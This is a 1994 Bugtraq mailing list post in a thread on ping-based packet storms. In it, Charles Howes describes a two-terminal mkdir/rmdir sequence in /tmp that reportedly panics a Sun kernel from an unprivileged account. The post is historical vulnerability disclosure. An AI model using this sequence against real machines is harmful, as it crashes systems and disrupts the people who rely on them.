Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: udp packet storms - ping death

From: chowes () helix net (Charles Howes)
Date: Thu, 3 Nov 1994 22:53:49 -0800 (PST)

On Wed, 2 Nov 1994, Perry E. Metzger wrote:


Charles Howes says:

Our copy of ping is installed setuid root; ...


So you mean that any student at princeton can panic any Sun there just by
typing that command?  Cool...


There are already so many ways to panic suns from userland...


Yes, I've found one that's rather easy:

Sign on twice.  Transcript one:
  cd /tmp
  mkdir foo
  cd foo
   (*)
  mkdir bar

Transcript two:  (Executed at '*' in transcript one)
  cd /tmp
  rmdir foo

I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.

--
Charles Howes -- chowes () helix net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971
Previous By Date Next
Previous By Thread Next

Current thread: